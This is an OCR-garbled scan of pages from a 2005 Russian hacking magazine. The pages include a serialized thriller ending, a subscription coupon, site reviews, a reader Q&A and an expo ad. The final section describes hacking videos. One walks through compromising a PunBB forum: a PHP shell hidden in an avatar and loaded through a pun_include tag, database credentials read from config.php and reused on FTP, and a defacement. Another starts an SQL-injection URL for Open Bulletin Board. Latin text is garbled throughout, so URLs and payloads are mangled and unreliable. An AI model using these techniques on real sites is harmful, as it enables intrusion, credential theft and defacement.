— Нет, ничего. Господи Боже мой, — запричитала учительница. 

— Если вдруг что-то станет известно — немедленно звоните нам, — 
попросил Кирякин. 

— Конечно. 



В обычный день Кирякин не стал бы сильно нервничать. Машка впол- 
не могла задержаться у какой-нибудь подружки и забыть предупре- 
дить родителей. На нее это похоже. Но сейчас в его голове было 
только одно — слова взломщика о грозящем ему наказании. В прак- 
тике следователя было всякое. Было такое, что загнанный в угол 
мелкий карманник становился убийцей, отправившим на тот свет 
нескольких человек. Кирякин понятия не имел, кто на самом деле 
Нострадамус, и на что он способен. Может быть, под наказанием он 
подразумевал отнять у него самое дорогое, что у него есть — дочь? 
Кирякин не стал рассказывать о своих страшных подозрениях жене. 
Лариса обзвонила подружек Машки, но никто из них не знал, где 
она. Тогда она стала обзванивать больницы. 

— Может, ты своим скажешь? — наконец спросила она. 

— Еще не прошло 24 часа. Они... 

— Я знаю, что не прошло, — перебила Лариса, -Но это твоя дочь. И 
ты, в конце концов, там не последний человек. 

Жена была права. Лучше начать поиски сразу, чем потом сожа- 
леть, когда окажется поздно. 

Кирякин набрал номер районной милиции... в этот момент раздал- 
ся входной звонок. Увидев на пороге дочь, Лариса накинулась на 
нее, выясняя, где та была, а Кирякин облегченно вздохнул. 

— Мам, ну прости. Мы с девочкой из художки поспорили, кто лучше 
закат нарисует... 

Глядя на дочь, Кирякин думал, что ему нужно обязательно найти 
хакера прежде чем истечет время. Каким бы ни было уготован- 
ное ему наказание, нельзя допустить его исполнения. У него ос- 
тавалось 14 часов. 

Продолжение следует 
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«Хакер» + 0Ѵ0 



«Хакер» + «Хакер| 



115р 


ЗА НОМЕР 

(экономия 30руб.*) 


1 ЗОр ЗА НОМЕР 

(экономия 30руб.*) 


207р 


ЗА НОМЕР 

(экономия 85руб.*) 


690р 


ЗА 6 МЕСЯЦЕВ 

(экономия 180 руб.*) 


780р ЗА 6 МЕСЯЦЕВ 

(экономия 180 руб.*) 


О. 

м 

м 

Т“ 


ЗА 6 МЕСЯЦЕВ 

(экономия 510 руб.*) 


1242р 


ЗА 12 МЕСЯЦЕВ 
(экономия 460руб.*) 


1404р ЗА 12 МЕСЯЦЕВ 

(экономия 516 руб.*) 


О. 

(О 

со 

м 

м 

1 1 


ЗА 12 МЕСЯЦЕВ 

(экономия 1250 руб.*) 



Как оформить заказ? 

Ш Заполнить купон и квитанцию 
[Ц Перечислить стоимость подписки через Сбербанк 
[Ц Обязательно прислать в редакцию копию оплаченной квитанции 
с четко заполненным купоном любым из перечисленных способов: 

по электронной почте: 8иЬвсгіЬе@дІс.ги; 

вд по факсу: 780.88.24; 

по адресу: 107031, Москва, Дмитровский переулок, д. 4, 

строение 2, ООО «Гейм Лэнд», отдел подписки. 



ВНИМАНИЕ! 

вд подписка оформляется в день обработки купона и квитанции. 

купоны, отправленные по факсу или электронной почте, обрабатываются в течение 5 рабочих дней, 
вд купоны, отправленные почтой на адрес редакции обрабатываются в течение 20 дней. 

РЕКОМЕНДУЕМ ИСПОЛЬЗОВАТЬ ЭЛЕКТРОННУЮ ПОЧТУ или ФАКС. 

Подписка производится с номера, выходящего через один календарный месяц после оплаты. 

Например, если произвести оплату в сентябре, то подписку можено оформить с ноября. 

ПО ВСЕМ ВОПРОСАМ, СВЯЗАННЫМ С ПОДПИСКОЙ, ЗВОНИТЕ ПО БЕСПЛАТНЫМ ТЕЛЕФОНАМ: 
935 - 70-34 (ДЛЯ МОСКВИЧЕЙ) И 8 - 800 - 200 - 3-999 (ДЛЯ РЕГИОНОВ И АБОНЕНТОВ МТС, БИЛАЙН, 
МЕГАФОН). ВСЕ ВОПРОСЫ ПО ПОДПИСКЕ МОЖНО ПРИСЫЛАТЬ НА АДРЕС: ІМРО@ѲЬС.Ни 



Подписка 

для юридических лиц 

Москва: ООО "Интер-Почта", 
тел.: 500-00-60, е-таіі: іпІег-розІ@зоѵіпІеІ.ги 
Регионы: ООО "Корпоративная почта", 
тел.: 953-92-02, е-таіІ: крр@зоѵіпІеІ.ги 
Для получения счета на оплату подпис- 
ки нужно прислать заявку с названием 
журнала, периодом подписки, банковс- 
кими реквизитами, юридическим и поч- 
товым адресом, телефоном и фамили- 
ей ответственного лица за подписку. 
ѵѵѵѵѵѵ.іпіегросітіа.ги 






«V 

подписной КУПОН 

Прошу оформить подписку: 



I I на журнал Хакер + 2 СО 
I I на журнал Хакер + ОѴО 
I I на комплект Хакер +2СО и Хакер Спец + СО 
Ц на комплект Хакер+ ОѴО и Хакер Спец + СО 



на 1 1 месяцев 




начиная с 


2005 г. 





I — I Доставлять журнал по почте 
* — * на домашний адрес 
I— I Доставлять журнал курьером на 
* адрес офиса (по г. Москве) 

Подробнее о курьерской доставке читайте ниже* 
(отметьте квадрат выбранного варианта подписки) 



Ф.И.О. 



дата рожд. I М I. I М I. I М I г. 

день месяц год 

АДРЕС ДОСТАВКИ: 

индекс 

область/край 

город 

улица 

дом корпус 

квартира/офис 

телефон ( ) 

е-таіі 

сумма оплаты 

* Курьерская доставка осуществляется только по Москве 
на адрес офиса. Для оформления доставки курьером 
укажите адрес и название фирмы в подписном купоне. 



Извещение 


ИНН 7729410015 ООО «Гейм Лэнд» 


ЗАО Международный Московский Банк, 


г. Москва 




р/с № 40702810700010298407 




к/с № 30101810300000000545 




БИК 044525545 


КПП -772901001 




Плательщик 




Адрес (с индексом) 




Назначение платежа 

Оплата за « » 

с 2005 г. 


Сумма 


Кассир 


месяц 

Ф.И.О. 


Подпись плательщика 






Квитанция 


ИНН 7729410015 ООО «Гейм Лэнд» 


ЗАО Международный Московский Банк, 


г. Москва 




р/с № 40702810700010298407 




к/с № 30101810300000000545 




БИК 044525545 


КПП -772901001 




Плательщик 




Адрес (с индексом) 




Назначение платежа 

Оплата за « » 

с 2005 г. 


Сумма 




месяц 

Ф.И.О. 


Кассир 


Подпись плательщика 
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«ЕВМА8ТЕВ6 
Иван Скляров 
(ѵѵѵѵѵѵ.зкіуаго^.ги) 
Иван Кузнецов ака ЗееО 
(зеес1@пзк.ги) 




Сервер 

тестировщиков 

0 ІтН'р://зоП\ѵаге-1'ез1'іпд.ги 
Когда-то давно работа тестировщика програм- 
много обеспечения была лишь уделом даунов, 
которые только и умели, что нажимать одну кноп- 
ку. В наше время тестировщик — это уважаемый 
человек, а само тестирование стало таким же 
непростым делом, как и прикладное программи- 
рование. На сайте можно найти всю информацию 
по тестированию: статьи, учебники, обзоры, 
ссылки, необходимый инструментарий, предло- 
жения по работе для тестировщиков. На сайте 
даже выходит е- 2 Іпе под названием «Тестирова- 
ние и качество». 

Легчайший ^ 
путь в ассемблер! 

0 ІгН'р;//ѵуеЬз1'ѳг.сз.исг.есІи 
Данный проект принадлежит автору многих бест- 
селлеров по ассемблеру — Рэндалу Хайду 
(НапбаІІ Нубе). Правда, я не знаю, переводились 
его книги на русский, или нет. На сайте, помимо 
информации о его книгах, можно скачать множе- 
ство документации и отборных туториалов по 
программированию на ассемблере под ѴѴІпбоѵѵз, 
Ьіпцх, 003. Разумеется, вся информация только 
на английском. Присутствуют также кое-какие 
тулзы для ассемблерщика, сами ассемблеры и пр. 

В помощь 
сисадмину 

0 \ллллл/.пе1\д/огксІос.ги 
Для тех, кто админит на ѴѴІп-платформах дан- 
ный проект будет просто необходим. Здесь вся 
самая подробная информация по администри- 
рованию ѴѴІпбо\л/з 2003 и 2000, настройке 
Асііѵе ОігесГогу, МісгозоП ЕхсИапде, ѴѴІпбоѵѵз 
Зсгірі Нозі (ѴѴЗН), МісгозоН ІЗА Зегѵег, 
ІѴЮаетоп, ѴѴІпѲаІе, ѴѴІпНоиІе и пр. А также 
НРС, служебные документы ФАПСИ, Гостехко- 
миссии России, ГОСТы, Нормативные доку- 
менты, акты. Присутствует новостная лента и 
админский юмор. 



1С Ореп 8оигсе 

0 ІтН-р://1І.\д/4Ь.ги 

Давно у программистов витают в воздухе мысли 
по созданию аналога знаменитой 1 С на свобод- 
ной основе. И вот, свершилось! Точнее, еще не 
свершилось, но проект активно прогрессирует во 
главе с профессиональной командой разработ- 
чиков. Называться новый 1С будет 1Г — очевид- 
но, потому что создается под Ыпих. Судя по той 
информации, что указана на сайте, сделано уже 
немало, но как и любому проекту, Ореп Зоигое 
нужны еще люди. Поэтому, если ты хорошо зна- 
ком как о 1С, так и о Ыпих, то присоединяйся. 



іуіпсірѵѵз Огіѵег 
ОеѵеІортепІ 

0 хллллѵ.озгопііпе.сот 
Это, пожалуй, самый известный и самый крутой 
ресурс для разработчиков драйверов под ѴѴІпбоѵѵз. 
Все, начиная от основ и заканчивая различными 
тонкостями этого непростого дела. Здесь можно 
скачать множество различных тулз для разработ- 
чиков и примеры драйверов. Есть удобный Опііпе 
□ОК, форум и, разумеется, предложения по рабо- 
те для профессионалов. Что-либо еще говорить 
бессмысленно, просто, если тебя интересует раз- 
работка драйверов, то тебе прямая дорога сюда. 
Вся информация только на английском. 



Изобретения, 
которые потрясут мир 

0 \ллллѵ.І2оЬге1'епуа.ги 
Ресурс ігоЬгеІепііа.гц представляет собой гло- 
бальное место для обора информации, касаю- 
щейся различных изобретений и инноваций, соб- 
ранной со всего мира. На сайте расположен ог- 
ромный архив статей и фотоматериалов данной 
тематики. Также рассматриваются так называе- 
мые «народные изобретения» — собственные 
изобретения обычных людей, присланные посе- 
тителями сайта. Если ты тоже придумал какой- 
нибудь интересный девайс — можешь смело по- 
сылать информацию о нем на сайт . Летающий 
автомобиль и автомобиль-амфибия, подводная 



авиация, беспилотные самолеты, роботы-андро- 
иды, интеллектуальная одежда — это только ма- 
лая часть того, о чем рассказывает сайт. 

Может, прыгнем? 

0 \ллллл/.\л/ог1с1]итрс1ау.огд 
Уважаемые жители планеты Земля! Спешу вас 
предупредить о надвигающемся преинтересней- 
шем событии. 20 июля 2006 года на 11 часов 39 
минут 1 3 секунд по Г ринвичу назначено время Все- 
мирного прыжка. Исследования, проведенные уче- 
ными, показали, что если 600 миллионов человек 
из определенных временных зон одновременно 
прыгнут, то наша о вами любимая планета перей- 
дет на другую орбиту, тем самым, увеличив свет- 
лое время суток на определенных ее частях. Так- 
же, улучшится экологическая обстановка и серьез- 
но замедлится процесс глобального потепления. 
На сайте установлен таймер обратного отсчета, 
показывающий сколько времени осталось до зна- 
менательного события. Количество прыгающих на 
время написания обзора было 188.038.191 чело- 
век. Так что всем быть готовым к вышеуказанной 
дате совершить маленький шажок-прыжок к свет- 
лому будущему — нашей о вами матушки-Земли :). 



Аты-баты, 

кошаки-солдаты 



0 \ллллл/.ре1'8іпипі1'огт.сот 
Человек — это такое существо, которое просто не 
представляет своей жизни без сосуществования 
рядом о мохнатым, пушистым и ласковым другом... 
В виде кошки или собаки, разумеется (а ты о чем 
подумал?). И как только не изгаляются любители 
домашней живности. В данном случае перед тобой 
ресурс, который превращает стандартных бобиков 
и кошек в военных зверей, одетых в униформу. До- 
вольно интересно и смешно наблюдать за таким 
зрелищем, перелистывая на сайте фотки пехотин- 
цев-доберманов, сиамских генералов и трогатель- 
ных рядовых шарпеев. Можешь убедиться в этом 
сам, изучив представленные на сайте работы. А 
если захочешь такой же славы своему четвероно- 
гому другу, становись клиентом этого ресурса дс 
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ЗАДАВАЯ ВОПРОС, ПОДУМАЙ! НЕ СТОИТ МНЕ ПОСЫЛАТЬ 
ВОПРОСЫ, ТАК ИЛИ ИНАЧЕ СВЯЗАННЫЕ С ХАКОМ/КРЯ- 
КОМ/ФРИКОМ — ДЛЯ ЭТОГО ЕСТЬ НАСК-РАО (НАСК- 
РАО@ВЕАЬ.ХАКЕР.Ри), НЕ СТОИТ ТАКЖЕ ЗАДАВАТЬ ОТК- 



РОВЕННО ЛАМЕРСКИЕ ВОПРОСЫ, ОТВЕТ НА КОТОРЫЕ 
ТЫ ПРИ ОПРЕДЕЛЕННОМ ЖЕЛАНИИ МОЖЕШЬ НАЙТИ И 
САМ. Я НЕ ТЕЛЕПАТ, ПОЭТОМУ КОНКРЕТИЗИРУЙ ВОП- 
РОС, ПРИСЫЛАЙ КАК МОЖНО БОЛЬШЕ ИНФОРМАЦИИ 



РА^СОММЕNТЗ 
Степан Ильин ака З^ер 
(1ар@геа1 .хакер. ги) 




О: Сейчас активно распространяется слух, что довольно старый процессор 
Іпіеі Репііит М, предназначенный для ноутбуков, может быть установлен на 
обычный РС и в производительности обыграть топовые модели 1п(е1 и АМО. 
Бред или намек на реальность? 

А: Подключить ІпІеІ Репііит М к обычному компьютеру действительно можно — 
для этого необходимо использовать специальный переходник, например, Азиз 
СТ-479. Во многом он очень похож на когда-то популярный адаптер 3оскеі370- 
>81о11 ,то есть принцип использования очень прост. Сначала в обычный разъем 
Зоскеі 478 материнской платы о чипсетом Іпіеі І865 или І875 устанавливается сам 
адаптер. После этого в сокет адаптера устанавливается уже процессор класса 
Репііит М и специальный кулер, который идет в комплекте о переходником. 

Ты спросишь: «Зачем так извращаться?». Видимо, есть причины :). С по- 
мощью такого адаптера, некоторых моделей материнских плат и обновленным 
биосом можно добиться невероятно высокой производительности, при этом 
система будет отличаться низким энергопотреблением. Авторитетным парням 
из Т от'з Нагбід/аге Оиісіе (\л/ш/.11ід.ги) удалось разогнать 2. 1 2 ГГц процессор до 
тактовой частоты 2,56 ГГ ц (частота РЗВ при этом была увеличена с 1 33 МГц до 
160 МГц). Результаты превзошли все ожидания. Такая связка была быстрее, 
чем Аііііоп 64 РХ и Іпіеі Репііит 4 Ехігете Ебіііоп. Вериться с трудом, но факты 
остаются фактами — ѵ/\т/.іІід.ги/сри/20050526/репііит4-21МтІ 

О: Помнится, пару лет назад была специальная утилита, позволяющая раз- 
гонять скорость Р8/2 порта до 200 Г ц (порт опрашивает мышку 200 раз в 
секунду). Мышка при этом становилась точнее и быстрее реагировала на 
резкие движения. Вопрос: а можно ли подобным образом «разогнать» 
иЗВ-грызуна, или 125 Гц — это максимум? 

А: Вообще говоря, увеличить скорость опроса УЗВ-порта можно ручками: 
для этого нужно покопаться в реестре и в НЕХ-редакторе подправить файл 
иЗВРОНТ.ЗУЗ. Но, чтобы не заморачивать себя подобными махинациями, 
лучше будет использовать специальную утилиту УЗВ Моизегаіе Зѵѵіісііег 
{ѵ/ѵ/ѵ\/.воПресИа.сот/деѴТѵ/еак/Зузіет-Тѵ\/еак/и5В-Моизегаіе-вѵ/іісІіег.зЫтІ). 
Для работы с программой необходимо запустить ѴѴІпсІоѵѵз в безопасном ре- 
жиме и войти в систему под администраторским аккаунтом. После запуска. 



иЗВ Моизегаіе Зѵѵіісііег сразу предложит «разогнать» порт до 1000 Гц. Но 
соглашаться на столь заманчивое предложение я бы не стал. Столь дикую 
нагрузку выдержит далеко не каждый порт, при этом ты реально рискуешь 
его спалить. Другое дело — 250 или 500 Г ц. При желании исходный файл 
иЗВРОНТ.ЗѴЗ можно восстановить, то есть убрать разгон. 

О: Для чего используется протокол АНР и почему без него невозможна ра- 
бота любой локальной сети? 

А: АНР (Абсігезз Незоіиііоп РгоіосоІ) — протокол поиска адреса. Известно, 
что в сетях нет однозначного соответствия между физическим адресом ин- 
терфейса (МАС-адрес) и его ІР-адресом. Зато такое соответствие может 
быть установлено с помощью протокола АНР. Объясняю подробно. 
Информация по локальной сети передается в сетевых пакетах, причем в 
каждом из них указываются адреса отправителя и получателя. Но исполь- 
зуются не ІР-адреса, как ты мог подумать, а физические МАС-адреса сете- 
вых устройств. Получается, что для оправки пакета на машину с адресом 
192.168.0.10, компьютеру сначала придется выяснить МАС-адрес удален- 
ного узла и только после этого формировать и отправлять пакет в Сеть. 
Для упрощения этого процесса каждый компьютер обладает так называе- 
мым АНР-кэшем, в котором хранятся соответствия ІР-МАС. Если компью- 
тер уже обращался к удаленному узлу, то его МАС-адрес должен быть в кэ- 
ше и может быть успешно использован. В противном случае по Сети про- 
ходит широковещательный АНР-запрос «Кто знает МАС-адрес такого ІР- 
адреоа». На такие запросы обычно отвечает сам владелец ІР-адреса, отп- 
равляя свои МАС- и ІР-адреса. Те помещаются в АРР-кэш отправителя и 
используются для дальнейшей работы. 

О: Я занимаюсь РР'ом и раскруткой сайтов: дело довольно прибыльное, но 
и работать приходится немало. Можно ли в Рігеіох настроить проверку ор- 
фографии? Я часто прямо в браузере пишу рекламные слоганы и неболь- 
шие тексты — надоело проверять их в ѴѴогсІ'е и сору-разіе'ить обратно :). 

А: Рігеіох — это расширяемый браузер, так что найти и подключить к нему 
можно все, что угодно :). Наиболее успешным проектом для автоматичес- 





юниты 



кой проверки орфографии считается ЗреІІВоипсІ (оффсайт — 
зреІІЬоипсі.зоигсе^огде.пеІ). Помимо этого нужно скачать и установить в 
программу русские словари — Шр://Ьаскир.тогіІІа.ги/воІѴги-из_бісі.хрі, 
Шр://сІоѵ/пІоасІз.тогсІеѵ.огд/сІісііопагіез/зреІІ-ги.хрі. 

О: Стукнуло мне в голову написать собственный файловый менеджер, ре- 
ализовать все свои задумки. Однако столкнулся с одной, казалось бы, пус- 
тяшной проблемой. Не могу понять, как можно нормально отобразить про- 
цесс копирования файла, то есть сделать так, чтобы РгодгѳззВаг (бегущая 
полоска с процентами) заполнялась в соответствии с процентом выполне- 
ния операции. Использую АРІ-функцию РІІеСору, и что-то ничего не получа- 
ется. Еще и тормозит почему-то... 

А: Знакомая проблема. Действительно если копировать файл о помощью 
АРІ-функции РІІеСору, то программа на время копирования файла попрос- 
ту подвисает. Такая фигня происходит из-за того, что приложение получа- 
ет обратно управление только по завершению работы вызванной функции. 
Чем больше размер файла — тем больше длится операция и, соответ- 
ственно, дольше программа «висит». Как понимаешь, при таком раскладе 
о визуализации процесса копирования придется забыть. Так что функция 
РІІеСору — это явно не самый лучший вариант. 

Скопировать файл можно и без использования АРІ. Алгоритм немудрен. Отк- 
рываешь два файла (один для чтения, другой для записи), после чего в цик- 
ле по кусочкам начинаем копировать инфу из одного файла в другой.То есть 
читаем блок из первого файла, пишем его во второй, смотрим на состояние 
счетчика и вычисляем процент скопированных данных — после этого заново 
повторяем последовательность операций. Скорость копирования напрямую 
будет зависеть от того самого размера блока, который был выбран. 

В принципе, то же самое можно выполнить с помощью специальной АРІ- 
функции СоруРІІеЕх, имеющей возможность отображать прогресс копиро- 
вания. Подробное описание функции и пример ее использования можно 
найти здесь — тт/.тепіаІіз.огд/арШзІ/СоруРІІеЕх.зМтІ. 

С: Я открыл ѴѴѳЬтопѳу-обмѳнник. Оборот пока небольшой (всего 
~200$/месяц), но перспективы есть. Вот хочу спросить: каким образом в 
случае потери можно восстановить файл о ключами от кошелька (’.кѵѵгп)? 
Его ведь на ѳ-таІІ вряд ли высылают. . . 

А: В случае потери ключа от ѴѴМ-кошелька геморрой тебе обеспечен. Для 
его восстановления придется заново регистрироваться в системе и для ново- 
го ѴѴМ-идентификатор получать персональный аттестат. Этот аттестат выда- 
ется любому участнику системы ѴѴеЬМопеу Тгапзіег после проверки его пер- 
сональных (паспортных) данных, процедуру которой проводят так называе- 
мые регистраторы. С этими регистраторами тебе придется встречаться лич- 
но (список по городам — Шрз://раззроіімеЬтопеу.ги/азр/НедІіз1.азр?геІ- 
ІісІ=130) или же отправлять по почте заверенные нотариусом копии докумен- 
тов. Сам аттестат стоит около 5-30$, так что идея восстанавливать кошелек 
о долларом на счету заведомо лишена смысла. Как только получишь персо- 
нальный аттестат, ты сможешь подать заявку на восстановление контроля 
над своим старым кошельком. Проблем на этом этапе возникнуть не долж- 
но, но за оказанные услуги придется раскошелиться еще на 5 \Л/М2 :(. 

О: Уже несколько раз сталкивался с проблемой, когда рІірМуАбтіп, ссылаясь 
на различные ошибки, не работал на удаленном сервере. Быть может, суще- 
ствует более надежная альтернатива для интерактивной работы с БД МуЗОІ? 

А: Несмотря на свою популярность, скрипт рІтрМуАсітіп не лишен недостат- 
ков. Во-первых, он действительно иногда отказывается корректно работать, и 
сделать что-либо в этой ситуации без прав рута практически невозможно. Во- 
вторых, это очень тяжелый скрипт (как-никак, 1 ,5 Мб), состоящий из массы 
файлов, что не очень удобно и значительным образом мешает его скрытой 
установке. В-третьих, рИрМуАбтіп открыто хранит в конфигах пароль в базе 
данных, то есть представляет собой реальную дыру в безопасности сервера. 
Впрочем, хорошая альтернатива ему все-таки есть — скрипт Н8Т МуЗОЕ ѵ2.0, 
" который не так давно зарелизила группа Низіі Зесигііу Теат {гзі.ѵоісі.ги). Этот 
^ скрипт полностью повторяет функции и возможности рИрМуАсІгпІп, но в неко- 
торых моментах даже обходит его. Т ы без труда сможешь просматривать и 
редактировать всевозможные базы, создавать новые и исправлять имеющи- 
еся таблицы, удалять из них конкретные записи. Я уже не говорю о составле- 
нии запросов к МуЗОЕ и быстром просмотре дампа базы. НЗТ МуЗОЕ не хра- 
нит в своих конфигах каких-либо паролей, но для удобства использования 
отображает информацию о системе, в которой установлен. Самый же суще- 
о ственный плюс этого скрипта — его размер (17 Кб в архиве). 

о 

ЭЕ, 

ш О: Почему на страницах вашего журнала вы так часто упоминаете программы д ля 

о. шифрования данных, если в ѴѴіпсІоѵѵвХР такая функция встроена по умолчанию? 

< 

X 



А: А почему ты не используешь встроенный файрвол? Или, например, муль- 
тимедийный плеер? Все по той же причине — сторонние продукты на поря- 
док лучше и предоставляют большие возможности. Как известно, ѴѴІпсІоѵѵз 
использует файловую систему МТРЗ, которая действительно поддерживает 
шифрование данных (Епсгуріесі РІІе Зуз(ет). По идее, доступ к закриптован- 
ным файлам имеет только пользователь, активизировавший для этих фай- 
лов шифрование. Одна лишь проблема — благодаря программе Абѵапсесі 
ЕРЗ Оаіа Ріесоѵегу {ѵѵѵѵт.раззѵѵогсіз.ги) обойти такую защиту можно всего за 
несколько минут. Утилита справится с задачей даже в том случае, если сис- 
тема не грузится или повреждены записи о ключах шифрования. Использо- 
вать ее можно под ѴѴІпсІоѵѵз ХР/2000/2003, но работая под ѴѴІпсІоѵѵз 2000, 
она предоставляет максимальные возможности и позволяет расшифровать 
файлы, даже не зная паролей пользователя и администратора. 

Впрочем, на этом «прелести» встроенного шифрования не заканчиваются. 
Епсгуріесі РІІе Зузіет представляет еще и реальную угрозу для сохраннос- 
ти файлов. Сбой в системе может вызвать искажение закрытого ключа, не- 
обходимого для расшифровки данных. В этом случае пользователь факти- 
чески теряет зашифрованную информацию, если, конечно, не воспользует- 
ся услугами АбѵапсесІ ЕРЗ Ваіа Ріесоѵегу. 

О: Скажи: реально ли программисту устроиться на удаленную работу через 
интернет? Отлично знаю С++ и Заѵа, но живу в провинции и работы с дос- 
тойным окладом найти не могу :(. 

А: РІе буду спорить, что найти удаленную работу о приличным окладом до- 
вольно сложно. РІО при большом желании ее найти все-таки можно. РІе рас- 
сматривая банальный поиск вакансий через поисковик, можно попробо- 
вать сделать следующее: 

0] Опубликуй свое резюме на форумах по программерской тематике. Я 
имею в виду не домашние странички Васи Пупкина, а форумы авторитетных 
порталов, типа ѵѵѵѵт.гзсіп.ги. Как правило, они имеют специальный раздел 
«Работа», где периодически появляются серьезные работодатели. Один 
мой хороший друг работает РРІР-программистом на московскую контору и, 
практически не напрягаясь, получает вполне приличные деньги (1300$). 

[2] Очень много объявлений по поводу работы (в том числе и разовой) пуб- 
ликуется в специализированных сообществах ЖЖ (тѵѵѵѵ.ііѵеіоитаі.сот). 
Зарегистрируй себе аккаунт и присоединись к таким коммунити, как 
ги_срр, ^и^аѵа, ги_зц1 и т.п. Если поискать, то наверняка найдешь сообще- 
ства, предназначенные именно для поиска работы. 

[Ц Можно попытать счастье и устроиться на работу за границей. Напри- 
мер, компания оОезк (ттѵѵ.осіезк.сот) приглашает Ігееіапсег'ов со все- 
го мира о опытом работы от 3-х лет и хорошими знаниями по следую- 
щим специальностям .МЕТ, Заѵа/32ЕЕ, С/С-и- ,ѴВ, РІазИ, АЗР, РегІ, 
РНР/МуЗОЕ, С#. Также открыты вакансии для дизайнеров и веб-дизай- 
неров. Все условия работы и информация об оплате (кстати, от 10$ / 
чао) доступны на сайте. 

О: Хотим подключить свою локальную сеть к спутниковому каналу. Уж 
очень прельщает возможность выкачивать фильмы и варѳз по смещным 
ценам за трафик. Ты не мог бы привести небольшой обзор провайдеров, 
которые актуальны для европейской части России? 

А: РІапеІЗку (тѵѵт.ріапеізку.сот) — довольно популярный в России сервис 
от загорелых кипрских парней. Подобно всем остальным провайдерам 
имеет транспондер (передающая часть спутника) на русском Ехргезз АМ22, 
который покрывает большую часть территории России. Самые дешевые 
цены на тарифы по трафику, разумным расценки на безлимитные подпис- 
ки, предназначенные для серфинга. Работает ускоритель ТС-РЕСѴ, кото- 
рый несколько уменьшает задержки, но при этом увеличивает объем тра- 
фика. Для оплаты можно воспользоваться услугами одного из российских 
ресселеров, коих великое множество. 

Зраседаіе (ѵѵѵт.зраседаіе.сот.иа/гиз) — провайдер, которого использую 
лично я. Примечателен разумными ценами (как по трафику, так и анлимы), 
стабильным каналом и возможностью использования чудо-ускорителя 
ѲІоЬах (ѵ/шт.дІоЬах.іпІо). Последний, используя сжатия трафика, не только 
экономит трафик, но и сводит на нет возможные задержки. Провайдер ис- 
пользует спутники Ехргезз АМ22 и N336 (карты покрытия всегда выклады- 
ваются на сайтах провайдеров) и предоставляет несколько способов опла- 
ты, в том числе через банк и ѴѴеЬтопеу 

«Радуга» (\л/\А/ѵ\/.сІ-ѵ.ги) — отечественный сервис, который появился совсем 
недавно. Пока еще не до конца отлажен и частенько дает сбой, поэтому ис- 
пользовать его не рекомендую. Тем более что цены ничуть не ниже, чем у 
других. Спутники: Ехргезз АМ22, Іпіеізаі 904, Ямал 200. 

Менее популярный провайдеры: Орепзку (тѵѵт.орепзку.пеі), возводившая- 
ся Еигоре Опііпе (ѵтт.еигореопИпе.пеі), ЗаЮаІе (ѵ/\л/ѵ/.заідаіе.пеі) з: 
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На аанноп экспозиции 5уаут 
поеаставлены успуги, интересные 
ШИРОКОМУ спою населения (В2С): 

♦ Комплексные инФокоммуникаиионные 
УСЛУГИ населению 

♦ Беспровоаная связь 

- ВІііеіооіІі 

- Услуги ММ3. СРПЗ 




специалистов в области информатизации и связи 
(В2В) и преаполагает слеауюшие направления: 

♦ ПнФокоммуникационные услуги на базе интеграции 
среаств связи и информатизации 

♦ Информатизация и компьютерные сети 

♦ Информационные системы 

♦ Телекоммуникации 






- Услуги аоступа в Интернет 

- ѴѴі-Г-і 

- Мультимеаийиые услуги на базе 
Интернета 

- Услуги спутникового, кабельного и 
наземного телевиаения 

- Интерактивные услуги в сетях 
поавижной связи 

- Мобильный Іпіеі'пеі 

- Оомашние сети 

- Услуги телемеаицины 

- ВнаеоконФеренцсвязь 

- Услуги местной, межаугороаной и 
межаунароаной связи 

- Телефонные аппараты 

- Мультнмеаиа-проаукты 

- Аксессуары 

♦ Интеллектуальный аом (Сопзіііпег еіесігопісз ) 
Тематика разаелов на стенае с|>ЦП "Электронная Россия": 

♦ Электронное правительство (Человек и госуаарство) 

♦ Электронный бизнес (Человек и бизнес) 

♦ Электронный МИР (Человек в электронном мире) 



♦ 

♦ 

♦ 

♦ 

♦ 

♦ 

♦ 

♦ 



Почтовые УСЛУГИ 

Научные исспеоования и технологии 
Беспровоаные технологии 
Электроника и электронные компоненты 
Интеллектуальный оом 
Интегрированные системы управления 



Мультирумные ауаио/внаеосистемы 

Презентационные системы оля конФереіш-запов 
и ситуационных комнат 
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[описание ролика: 

РипВВ Раокіпд: #ОЕРАСЕ 
автор видео: КЕ2] 

Уже давно известно, что мелкий форум РипВВ 
поимел крупные дырки. 

Последняя бага в этом довольно распространен- 
ном форуме дала возможность не только полу- 
чить доступ администратора, но и шелл-акцес к 
серверу. В этом видео хакер находит на гугле 
один из бажных форумов, и сразу бежит ломать 
его. Сначала хаксор хитрым методом получает 
доступ админа, после чего приступает к более 
интересной части своего злостного плана. 
Разработчики, наверное, не учли, что можно вста- 
вить псевдо-тег <рип_іпсІисІе ...> в описание фо- 
рума, дав тем самым взломщикам возможность 
еще глубже похакать его. Тег <рип_іпсІисіе> мо- 
жет подключать только локальные файлы, но ни- 
чего страшного в этом нет. Хакер о легкостью заг- 
ружает псевдо-аватарку юзера, которая на самом 
деле содержит в себе РНР-шелл. Она будет ски- 
нута в ітд/аѵа(аг5/[Ю_ПОЛЬЗОВАТЕЛЯ].Ірд. Так 
как наш юзер имеет Ю=7, то вставить сетевому 
падонку нужно будет такой тег: <рип_іпоІисІе 
Ітд/аѵа1аг5/7.)рд>. Сохраняем... Идем на глав- 
ную... Присваиваем переменной огпб значение іб, 
передаем данные скрипту іпбех.рИр и видим, что 
вместо описания форума отобразились наши пра- 




ва в системе. Итак, теперь мы имеем веб-шелл. С 
его помощью можно просмотреть список файлов 
и найти там сопЯд.рИр. Читаем файл, в Раде 
зоигсе находим логин и пас к тузді. Обычный кон- 
фиг всех форумов. Что-то подсказывает мне, что 
надо попробовать за- 
логиниться с получен- 
ным логином и пасом 
на фтп. Неожидо- 
настью стало интерес- 
ное совпадение ;) И вот 
я уже роюсь среди фай- 
лов сайта в поисках 
іпбех-паги. Как выясни- 
лось, она называется 



іпгіех.рИр (странно, правда?). Чуть 
меняем ее, что бы сделать де- 
фейс... И вот на главной странице 
буржуйского сайта теперь красу- 
ется надпись: «Хакер самый луч- 
ший!». Но вскоре я все возвра- 
щаю на свои места и оповещаю 
администрацию о найденной уяз- 
вимости. 



[описание ролика: 

Орел ВиІІеІіп Воагб Маскіпд 
автор видео: СІКіІІѳг] 

В этом простеньком видео хакер демонстрирует 
пример использования недавно написанного 
сплоита командой гзі для форума Ореп Виііеііп 
Воагб версии <=1.0.5. Уязвимость здИп)ео11оп, 
найденная в скрипте іпбех.рПр, имеет следующий 
вид: іпгіех.рИр?СЮ=999+ипіоп+зеІес1+1 ,1 ,разз- 
